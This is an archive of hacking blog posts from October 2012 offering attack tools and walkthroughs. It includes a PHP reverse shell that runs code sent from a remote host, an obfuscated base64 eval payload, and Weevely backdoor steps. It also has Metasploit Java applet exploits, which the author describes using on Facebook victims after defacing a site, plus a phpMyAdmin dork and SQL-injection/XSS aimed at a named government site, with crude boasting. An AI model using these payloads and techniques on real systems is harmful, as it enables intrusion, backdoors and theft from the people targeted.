October 2012

Tuesday 30 October 2012

Python Directory, Admin Page, phpMyAdmin and Shell Scanner

Ajith KP October 30, 2012

Hi guyzzz long after I have made a new tool to scan Directory, Admin Page, phpMyAdmin, and Shell in Python.

It will works in LINUX OS. It is hard to run in WINDOWS because text color will make problems in WINDOWS.

Download Link: https://packetstormsecurity.com/files/117773/Directory-Scanner-Tool.html

Hope you like this... Please write your comments....

Monday 29 October 2012

Hacking

phpMyAdmin DB --> Google Dork

Ajith KP October 29, 2012

some of foolish admins have forgot to hide phpMyAdmin.

We can use this vulnerability to pWn database directy without using other exploits like SQLi.

We can obtain DB directly.

Google Dork: inurl:"index.php?db=information_schema"

Look the bellow image how phpMyAdmin looks...
Lets pWn DataBase....

Saturday 27 October 2012

Vulnerability

"r00t"ing server with WEEVELY

Ajith KP October 27, 2012

WEEVELY is a python application which helps hacker to backdoor server and r00ting.

Download : http://cloud.github.com/downloads/epinna/Weevely/weevely-0.7.1.tar.gz

Generating BackDoor[PHP]

terminal@terminal:~/weavely$ python ./weevely.py generate ajithkp

[python ./weevely.py generate <password> --> here ajithkp is my password]

Getting "TERMINAL" to r00t

Upload generated PHP shell to server.

Eg. http://shelled.com/path/to/the/reverse.php

Execute command in your terminal,

terminal@terminal:~/weavely$ python ./weevely.py http://shelled.com/path/to/the/reverse.php ajithkp

[python ./weevely.py <urltobackdoor> <password>]

After successfully connected...

I'm going to execute whoami

Now going to change Current Directory to /home/
$ cd /home/
$ ls -al

Hope you will like this hacking tutorial... Happy r00ting... I'm not like to r00t server and mass deface now... I Love only to breach security,,, Fuck Security!!!!!

Vulnerability

DirDictionaryBruter Directory and Files Brute Forcer

Ajith KP October 27, 2012

This simple python application will help to find the unlinked files in server.
You need a best Dictionary and save it as "DirList" in same directoty of python file.

Run it by,

python ./DirBrute.py

Input the URL which you need to brute force direcories.

It will save the founded files and directories logs in "DirLogs.log"

Open it and read that. It will help you to find hidden juicy files such as admin pages, text files, Uploaded PHP Shells, etc.

Fun with it...

Source Code

#
# Greets to TOF members Coded32, null void, X-Hund, Evis, John, Alex and all Unkown members
# Love to AMSTECK COLLEGE, Kalliasseri : Dheeraj, Ashwin, Jhelai, Arjun, Vipin, Jitendra
# Special Thanqs to Vishnu_Nath
#
import time
import urllib2
from urllib2 import Request, urlopen, URLError
import socket
import sys

scan=0
found=0
n_found=0
create=open("DirLogs.log", "w")

timeout = 10
socket.setdefaulttimeout(timeout)

try:
    print "\t################################################################"
    print "\t# TerminalCoders.BlogSpot.iN             OpenFire-Security.Net #"
    print "\t#       ###############      ########       ############       #"
    print "\t#       #             #     ##      ##      #          #       #"
    print "\t#       ######   ######     ##      ##      #   ########       #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #   #          ##      ##      #   #####          #"
    print "\t#            #   #          ##      ##      #   #####          #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #####    [#]    ########   [#] #####              #"
    print "\t#                                                              #"
    print "\t# coded by Ajith KP                        DirDictionaryBruter #"
    print "\t#                          Greets to Coded32 and T.O.F members #"
    print "\t################################################################"
    var1=0
    var2=0
    try:
        dirlist = open("DirList", "r")
    except(IOError):
        print "DirList Not Found!"
        exit()
    dirs = dirlist.read().split('\n')
    try:
        site = raw_input("\nURL: ")
        print ("\tChecking website " + site + "...")
        conn = urllib2.Request(site)
        urllib2.urlopen(site)
        print "\t[$] Yes... Server is Online."
    except (urllib2.HTTPError) as Exit:
        print("\t[!] Oops Error occured")
        raw_input("\t[!] Possible problems: Server offline, Invalid URL,Internet offline")      
        exit()

print("\t[+] Scanning " + site + "...\n\n")
    for dirz in dirs:
        dirz.replace("\n", "")
        dirz="/"+dirz
        url_z=site+dirz
        print("[#] Checking " + url_z+"...")
        req=Request(url_z)
        time.sleep(5) # For Bypass BOT TEST & DDOS TEST
        try:
            response = urlopen(req)
        except URLError, e:
            if hasattr(e, 'reason'):
                print("\t[x] Not Found")
                n_found=n_found+1
            elif hasattr(e, 'code'):
                print("\t[x] Not Found")
                n_found-=n_found+1
        else:
            try:
                logs=open("DirLogs.log", "a+")
            except(IOError):
                print "\t[x] Failed to create DirLogs.log"
            found_url=url_z
            print("\t>>> Found "+found_url)
            logs.writelines(found_url+"\n")
            found=found+1
            
        tot=n_found+found
        logs.close()
    print "\t\nTotal scanned:",tot
    print "\tFound:",found
    print "\nFounded Logs are saved in DirLogs.log, Read it"
except (urllib2.HTTPError, socket.error):
    print "\n\t[!] Session Cancelled; Error occured. Check internet settings"
except (KeyboardInterrupt, SystemExit):
    print "\n\t[!] Session cancelled"

Wednesday 24 October 2012

Vulnerability

PHP Reverse Shell [Edited]

Ajith KP October 24, 2012

[NOTE : This is not coded by me. The real code is generated by Metasploit. I have Just edited to add some features]
Guyzzz I have edited the PHP reverse shell which generated by Metasploit. I have added feature to find IP Address of attacker automatically. Now it is awesome in working because we don't want change the IP Address in PHP script, if your IP Address is dynamic.

#<?php
$server_ip=$_SERVER['SERVER_ADDR'];
$my_ip=$_SERVER['REMOTE_ADDR'];
$ip = $_SERVER['REMOTE_ADDR'];
$port = 5600;
$ipf = AF_INET;
echo '
<html>
<body bgcolor=black background=http://img54.xooimage.com/files/f/7/2/kbk29185-227a592.gif /><title>Reverse | Shell</title><center>
<style>
.footer { width:910px; border:1px solid red; background-color:black; color: green; -webkit-border-radius: 20px; border-radius: 20px; }
.header { width:910px; border: 2px solid green; background-color:black; color: green; font-size:200%; -webkit-border-radius: 20px; border-radius: 20px; font-family: Algerian; }
.container { width: 910px; border: 2px solid green; background-color: black; color: green; -webkit-border-radius: 5px; border-radius: 5px; }
input { background-color:black; color:green; border: 1px solid green; -webkit-border-radius: 5px; border-radius: 5px; }
</style>';
echo '
<div class="header">
<p>
<--TOF REVERSE SHELL TOF--><br />
<font color=red size=2>'.php_uname().'</font><br />
<font size=3>
Server IP: <font color=red>'.$server_ip.'</font> 
Your IP: <font color=red>'.$my_ip.'</font><br />Ajith Kp</font>
</p>
</div>
';
echo '<br /><div class="footer">
<p>
Team Open Fire<br />2012<br /><br />Greets to:~# Coded32,Indrani Banerjee, Al3x, Evis, John and all unknown buddies<br /><br />Love to:~# Amsteck College, Kalliasseri<br />BCA [Dheeraj, Aswin, Arjun, Vipin, Sharath]<br />BSC [Jhelai, Jitendra, Reshma, Ranjitha]</p>
</div>
<br />';
echo '<div class="container">
 <p>
<font color=red size=4><u>RESULT</u></font></p>
<p>
';
error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.

if (FALSE !== strpos($ip, ":")) {
	# ipv6 requires brackets around the address
	$ip = "[". $ip ."]";
	$ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
	$s = $f("tcp://{$ip}:{$port}");
	$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
	$s = $f($ip, $port);
	$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
	$s = $f($ipf, SOCK_STREAM, SOL_TCP);
	$res = @socket_connect($s, $ip, $port);
	if (!$res) { die(); }
	$s_type = 'socket';
} else {
	die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) { 
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
	# We failed on the main socket.  There's no way to continue, so
	# bail
	die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($b) < $len) {
	switch ($s_type) { 
	case 'stream': $b .= fread($s, $len-strlen($b)); break;
	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
	}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();
echo '</p>
</div>
';

Tuesday 23 October 2012

Vulnerability

Generate Reverse Shells using Metasploit

Ajith KP October 23, 2012

Metasploit comes with some built-in Reverse Shells generating power. You can easily create Reverse shells with very small commands.

PHP Reverse Shell

PHP reverse Shell can be create a small command.

Open Terminal in your Linux OS
Copy the bellow command and execute this command. Thats all for generate PHP Reverse Shell

Note:

Replace LHOST=117.235.152.218 LPORT=5600 with your IP Address and Your Favorite Port [Use any ports other than reserved ports like 80, 8080, 23, etc]

[Note: reverse_perl.pl is created by another command. Here we don't want to use this.]
Upload reverse.php to any server.

[Download this CommandExecutor & Uploader from here ]

Open Uploaded reverse.php in your favourite Web Browser.

Accept Reverse Connect Using Metasploit

Open Metasploit Console.

msf > use multi/handler
msf exploit(handler) > set LHOST 117.235.152.218
LHOST => 117.235.152.218
msf exploit(handler) > set LPORT 5600
LPORT => 5600
msf exploit(handler) > exploit -z -j

After Successfully connected you can execute "shell" for pWn targets Terminal. Then r00t your targets.

Thursday 18 October 2012

Vulnerability

Java Applet Field Bytecode Verifier Cache Remote Code Execution with Social Engineering

Ajith KP October 18, 2012

Guyz Browser AutopWn using this metasploit module is very easy. It is also new threat in cyber world.

Open Metasploit Console.

msf > use exploit/multi/browser/java_verifier_field_access

msf exploit(java_verifier_field_access) > show targets

Exploit targets:

   Id Name
   -- ----
   0   Generic (Java Payload)
   1   Windows x86 (Native Payload)
   2   Mac OS X PPC (Native Payload)
   3   Mac OS X x86 (Native Payload)
   4   Linux x86 (Native Payload)

msf exploit(java_verifier_field_access) > set LHOST 117.231.34.82
LHOST => 117.231.34.82
msf exploit(java_verifier_field_access) > set LPORT 560
LPORT => 560

msf exploit(java_verifier_field_access) > set URIPATH /
URIPATH => /

msf exploit(java_verifier_field_access) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 117.231.34.82:560
msf exploit(java_verifier_field_access) > [*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://117.231.34.82:8080/
[*] Server started.

Yes we have set up a malicious server at http://117.231.34.82:8080/

I have already hacked a server.

I added a deface page "pirr.html" with a JavaScript

<SCRIPT language="javascript">window.location="http://117.231.34.82:8080/";</SCRIPT>

It will redirect the victim to to my malicious server :p

I shared the deface page link in my facebook. [Social Engineering :p]

Yes I got two victim to F*cK.

I select 2nd victim to pWn... MmMmMm....

sessions -i 2
meterpreter> sysinfo

computer : xxxxxxx

os : xxxxxxx

meterpreter: java/java
meterpreter> shell

Yes my pen*s have touched her a*s.

meterpreter> pwd
/home/xxxxxxxx

meterpreter> ls -al

Yes it penetrated into there.
Now I pWned here.

Guyz if you like this post please post your comments... :)

Saturday 13 October 2012

Vulnerability

Java Signed Applet Remote Code Execution with Metasploit

AJITH KP October 13, 2012

This is the new threat in cyber world. [Metasploit]

It enables Hacker to execute commands in victims computer.

Here I have made a tutorial to hack PC using this vulnerability.

You need tho install the module. I'm not going to describe how to install module.

Open Metasploit Console.

Input command,

>use exploit/multi/browser/java_signed_applet

First step over, now you need to set up malicious server in your PC

Find you IP address as first step to set up malicious server.

Open Command Prompt and execute command ipconfig

[For Linux User ifconfig]

Next execute a series of commands in Metasploit Console.

>set LHOST 117.230.54.146

>set LPORT 560

>set URIPATH ajithkp560

>set TARGET 0

>exploit -j

Yes We have set up Malicious Server at http://117.230.54.146:8080/ajithkp560 :)

Yeah now Metasploit have started to seek the victim for connect.

This Image is taken by me without using the command set URI ajithkp560

Yes Victim will connect if he run the Bytecode Verifier. :p

Yes we have done....

>sessions -i 1

This command is for connect to First Victim who connected to your malicious server.

Now we have connected to first victim :p

Yo... Baby we have connected to our victim.

Next command is for access the Command Prompt of victim :p

>execute -H -i -f "cmd"

Yo... Yo... pWned Command Prompt of victim :p

Now I'm going to Change Directory to E:\

>e:\

>dir

Guyz I have spend my 1 hour to create this tutorial and pWn victim. So please spend your 10 seconds to write your comments...

Friday 12 October 2012

Vulnerability

Domain Watcher

AJITH KP October 12, 2012

It is the PHP application which will help you to find out the domains and users hosted in shelled server.

But it can not SYM link the server. We are recommending "Mannu Shell" by IndiShell for SYM Link.

Just for watch the domains and their owners.

Code:

<?php
$r00t3d = 'vVVdc+I2FH3PTP7DXW+2QAdsIKXbEHDIbpZ2s23TKTR9yGQY2Ra2gm25khxg0+1v75VkAluSTqedKQ/Ylu7HueeeKx0e0DDhUDs8GAQ8WkMQhzzlYhikJFxAgH+x4GUeDROlir7nsSzufeWuOGcZiakb8sybs5RKb+699rreIlh0Tzrf9Frd7mvSO+m6MZuD5w8UUyn1L3hGWA6/w69EhQkVA8+uD0KaKyp8BCHVGhcOD9yEkogKeIAli1TSP+m0i9VpwAUu9qFbrEDylEUQC0rz0x2gLYO/b/Cfgv3YWM15rlqSfaT9brv96hRaSxosmGrZsC1BIlZKjK5TwZOLnxBZiFGwjB1wYNHBP4cHT+J7Bk/vCTi9DZo552qPpw2Szr/jCeMqEqQUoz4XCE20XppAmlCgnaF2TjKWrvuKJNjoKtl+rg1LnUJ+HvO5ZnV6Jh/pJ/zelLqPNsLVhLI4UX04tgz8PeUbPiyrlYWuEn0wy3/oyMDbaNhMlH5G7B7ClEg5dKysHb3amrpX7rjlQzUW1VDA48bA0xz4tdPDakgH+hs0J8OuD4NA4Gg97hZJMStzktF6Y+tgTDBX4d8MCCSCzhGCneTlculOqchYTtK3HEFJ903K40nBlctyx4fveEbhJ5xyGHjEv8Wx3YvBC5rPmaAtScNSMLV2c6rQdcxFmVk3TUiBpSAH/hbxUSlFBEMgQpC1AXykjxFcGbGsSBFOfaQX6o5HVejpsiI9eHOn8UR1O/zacXD8KSUZnB9fXHb7cH7HVAIfiiacy2TJcnzeZSSFSy6TJlwklApyBx+um3CZ0JQwmJAEu3RP0PKSKZpHgsCE5TFa25zTq7F96bY7XVubrorN6y9MHY0HiBit1wYyFKxQPkmpUHVHtNtqpJHNrpC42RiZ6/9xBBMuxBrekhx+5Ap+RoXAWJOB0oC98lFeNmatYeRWCBrPMi2dGUnTuvPSGHt198uzhhsFL52mZbZ5RBaFITrimdxQj4phv5W0rjdvOrd6HzUYLrYacmyh1f+W6drjMVjztbyub2HKFbJq1SxRAzh70AekzLfCtTeLoJHvYDFlruoGS8N1KqUPvABLtgG0arC19hwiKYvzob0lqrkbduyJN+ydvIKQpmlBogh7NOwZN4F3TrSX9xdpLp3oyc1NXr3lYQAHKZhzQUmYWKBAJOiXxoMVMJJYcMlWs5iqYlmyyGqWL5GUSrj3iJxIvB4d13iaBiDXH9FXh7ip6XbVbnHZ9qMoJWbT09GEumNNHxGb7LCD0MRDEUiO8jJejS1osCsG9YKuYYj+iKekDcACAH9VgyuyHHArAxu02vVMCywbZR4qxnOoNPJQH9k+jujKDm2NFbXmX0Z4Nhu///7dbNbA34vh1w04G5V5yvLFdqfvOKefPh/r3RPj/x9w1KyecdTjzpybt2/xYlAStQ4/rGGZcFRnUKLyqIS5wO6gG3wB7/OITTBXap0mBQ0ZApomJF9IiDlaKw762I2Ou014F+D5f43bKEFpqkBXfKbHK0TIk7xiwzM3ij5qznz4Ew==';
eval(gzinflate(base64_decode($r00t3d)));
?>

Note: This application is not fully coded by mE...

Programming Language

Java Applet : Your First Program

AJITH KP October 12, 2012

Java Applet is an web applications programming language. It is very easy to study and also easy to program. Here I would like to create a simple Java Applet which have black background and green text color. You need to save this as FirstApplet.java

Code:

Compile this to bytecode using command "javac FirstApplet.java". After success full compilation yo will get a class file named FirstApplet.class

Next you need to create a HTML page for run this applet

Code:

Save the above code as any name as you wish. But it must have an extension of HTML.

Now open this html page in your favorite browser

Wednesday 10 October 2012

Programming Language

C Program to print increasing of "*"

Ajith KP October 10, 2012

It is an program to teach "for loop" for starters. Here code

Code

It is not a pro codes... It is only a starters code.

Vulnerability

RFI Vulnerability: Arises and Defence

Ajith KP October 10, 2012

RFI is a type of attack which attacker tried to execute PHP commands. I have explained both Remote Command and Code execution in previous post. Read here

The bellow code is an example of RFI enabled PHP page.

Save this as page.php and open the URL,

http://localhost/path/to/page.php?page=http://www.terminalcoders.blogspot.in

you can see the http://www.terminalcoders.blogspot.in opened in your browser on localhost.

Some Protection methods

To protect from RFI with simple way edit the php.ini file. Open php.ini in editor. Find allow_url_fopen and allow_url_include and change from on to off . It will resist the page from inclusion of remte page...

Edit php.ini and change from on to off register_globals, and use E_STRICT to find uninitialized variables.

Next is editing of .htaccess in apache server. Copy the bellow code and add this to .htaccess

It will redirect the malicious query included request to the http://www.terminalcoders.blogspot.in

Sunday 7 October 2012

Vulnerability

AJJA Command Executor

Ajith KP October 07, 2012

Guyzzz we have coded a simple command executor shell in PHP. Look a while this shell.

Source Code

Thursday 4 October 2012

Vulnerability

Remote Command 'N Code Execution with Examples

Ajith KP October 04, 2012

Guyzzz welcome to _TERMINAL_CODERS_ Here I would like to explain Remote Command and Remote Code Execution attacks with examples. We can execute remote commands with two different methods.

Exec : We can execute commands in remote machine. But the string result or the steps with string cannot able to see. But command will executed there.

Passthru : we can execute command and also the result is enable to see.

Remote Command Execution

Remote Command Execution attack is a type of attack which attacker can execute "System Commands" in Remote Machine.

An example of remote command execution with Exec method is LFI [Local File Inclusion]. Lets start LFI with examples. LFI vulnerability arises when programmer includes further pages or data without properly sanitizing it.

Create a PHP file withbellow code,

Code:

Save the above code as "index.php".

Next create another PHP file with bellow code,

Code:

Save the bellow as "contact.php".

Next create another PHP page with bellow code,

Code:

Save this as "file.php".

The file "file.php" havent declared the file perfectly.

So lets open "index.php" in your browser.

The file.php have started with index.php Now change the URL to "http://localhost/LFI/file.php?file=contact.php"

Now it have opened contact.php It is the vulnerability of LFI. Read Hack with LFI Vulnerabily Devil'sCafe

Next remote command execution with "passthru" method.

Create a PHP File with bellow code,

Code:

Save the code as "cmd.php".

Open it in browser. But you cannot see anything here.
Change the URL to "http://localhost/cmd/cmd.php?cmd=dir"
[I'm using Windows OS. So I use Windows System Command].

You will get result as bellow image.

Remote Code Execution

Unlike Remote Command Execution, Remote Code Execution is an attack with execution of PHP command in Remote Machine. An example of Remote Code Execution is "RFI"[Remote File Inclusion].

Copy the bellow code,

Code:

Save it as "page.php"

Open it in your browser. You can see head "_TERMINAL_CODERS_"

Now cange the URL to,
"http://localhost/RFI/page.php?page=http://www.terminalcoders.blogspot.in"

Guyzzz I have spend about half an hour to create this tutor...
Please spend your 30 seconds to add your comments...

Wednesday 3 October 2012

XSS

XSS via SQL Injection

AJITH KP October 03, 2012

Hello Guys. You can use SQLi instead of XSS injection. Yes it is a simple trick.

[0x01] You got SQLi vulnerability in website
http://www.vulnerable.com/index.php?id=560

[0x02] Next count the columns. You got 5 columns and column 3 is 
vulnerable.

[0x03] Next encode your JavaScript to HexaDecimal value.
Eg. <script>alert("Ajith 'n Ajmal")</script> 's hexa decimal value is 3c7363726970743e616c6572742822416a69746820276e20416a6d616c22293c2f7363726970743e

[0x04] Insert the hexa decimal value into group_concat function.
That is now use URL 

www.vulnerable.com/index.php?id=560+UNION+SELECT+1,2,group_concat(0xhexadecimalvalue),4,5

 
Eg. http://www.commerce.gov.pk/ptmaview.php?ID=-32+union+select+1,2,3,group_concat%280x3c7363726970743e616c6572742822416a69746820274e20416a6d616c22293c2f7363726970743e%29,5,6,7,8,9,10,11,12,13,14 



[0x05] By Team AJJA[Ajith Kp | Jhelai Sahadevan | Jitendra Singh | Ajmal Joshi]
Hope You Like this trick...

if you share this in your blogs please add my link to this blog...